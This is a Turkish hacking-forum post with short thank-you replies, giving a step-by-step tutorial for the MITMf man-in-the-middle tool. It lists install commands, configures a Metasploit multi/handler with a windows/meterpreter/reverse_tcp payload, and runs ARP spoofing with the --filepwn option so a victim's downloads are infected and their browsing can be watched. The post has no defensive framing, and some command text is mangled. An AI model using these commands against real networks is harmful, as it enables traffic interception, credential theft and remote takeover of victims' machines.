MITMf Nedir ve Nasıl Kullanılır ?

Laurange · 19 Nis 2020

MITMF saldırısı, bir ağda gerçekleştirebileceğiniz en etkili ve tehlikeli saldırılardan biridir. Bunu yalnızca ağa bağlı olduğunuzda gerçekleştirmeniz mümkün.

Paket akışını herhangi bir istemciden cihazınıza yönlendirmek için kullanılabilir. Bu, istemciye veya istemciden gönderilen herhangi bir paketin cihazınızdan geçmesi gerektiği anlamına gelir ve şifreyi ve ağın anahtarını bildiğiniz için, bu paketleri okuyabileceksiniz. Bu saldırı çok etkilidir çünkü korunmak çok zordur.

Bazı Özellikleri

SMB, HTTP ve DNS sunucusu, SSL değişikliğine izin veren SSLStrip proxy'nin değiştirilmiş bir sürümünü ve kısmi bir HSTS bypassını içerir.

Yapılandırma dosyası MITMf çalışırken anında düzenlenebilir, değişiklikler çerçeve içinden geçirilir: bu, bir saldırı yaparken eklentilerin ve sunucuların ayarlarını değiştirmenizi sağlar.

0.9.8 sürümünden itibaren, MITMf aktif paket filtrelemeyi ve manipülasyonunu destekleyerek kullanıcıların herhangi bir trafik veya protokol türünü değiştirmesine izin veriyor.

Kurulum işlemini bu komutlarla gerçekleştirelim:

apt-get install python-dev python-setuptools libpcap0.8-dev l i b n e t filter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file

Kod:

pip install virtualenvwrapper

Kod:

git clone [url]https://github.com/byt3bl33d3r/MITMf[/url]

Kod:

cd MITMf && git submodule init && git submodule update recursive

Kod:

pip install -r requirements.txt

Daha sonra yeni bir terminal açıyoruz ve msfconsole yazarak m3tasploit Frameworke erişerek bu komutu yazıyoruz:

Kod:

load msgrpc

MSGRPC Password karşısında yazılanı kopyalıyoruz ve mitmf.conf dosyası açıyoruz.

****sploit rpcpassta yazılan parola kısmına yapıştırıyoruz.

Daha sonra diğer terminalimizden ipconfig yazarak hostumuza erişiyoruz ve kopyalayarak mitmf.conf dosyasının içindeki (Eğer VMware
Workstation kullanıyorsanız) WindowsIntelx86daki host kısmına yapıştırıyoruz.

Sonra m3tasploite geçerek sırayla:

Kod:

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost (host adresi) set lport (port) exploit

Sıradaki komutlar:

Kod:

ls python mitmf.py

Son olarak:

Kod:

python mitmf.py --spoof --arp -i eth0 --gateway 192.168.246.143 --target 192.168.246.143 --filepwn

yazıyoruz terminale.( Hedef adresi ve kendi adresinizi belirtin)

Gördüğünüz gibi artık işlem başarıyla tamamlandı.

Kurban hangi siteye giriş yapmış artık görebileceğiz.

Daha Fazlası İçin Dergi 42 Sayısını Ziyaret ediniz..

Rumexus · 19 Nis 2020

Cevap: MITMf Nedir ve Nasıl Kullanılır ? | Dergi İçin Makale

Eline sağlık

)

ZuL-RaA · 19 Nis 2020

Cevap: MITMf Nedir ve Nasıl Kullanılır ? | Dergi İçin Makale

Ellerine sağlık bunuda kod satırına alırsan iyi olur .

apt-get install python-dev python-setuptools libpcap0.8-dev l i b n e t filter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file

Laurange

Code bloğu gelmiş ancak bu seferde içeriği yok.

Çiçero · 19 Nis 2020

Cevap: MITMf Nedir ve Nasıl Kullanılır ? | Dergi İçin Makale

Elinize sağlık kardeşim..

'Bertuğ · 19 Nis 2020

Cevap: MITMf Nedir ve Nasıl Kullanılır ? | Dergi İçin Makale

Ellerine Sağlık Hocam .

'Adige · 9 May 2020

Emeğinize sağlık

MITMf Nedir ve Nasıl Kullanılır ?

Laurange

Kıdemli Üye

Rumexus

Kıdemli Üye

ZuL-RaA

Kadim Üye

Çiçero

Uzman üye

'Bertuğ

Kıdemli Üye

'Adige

Administrator

Sosyal medya sayfalarımız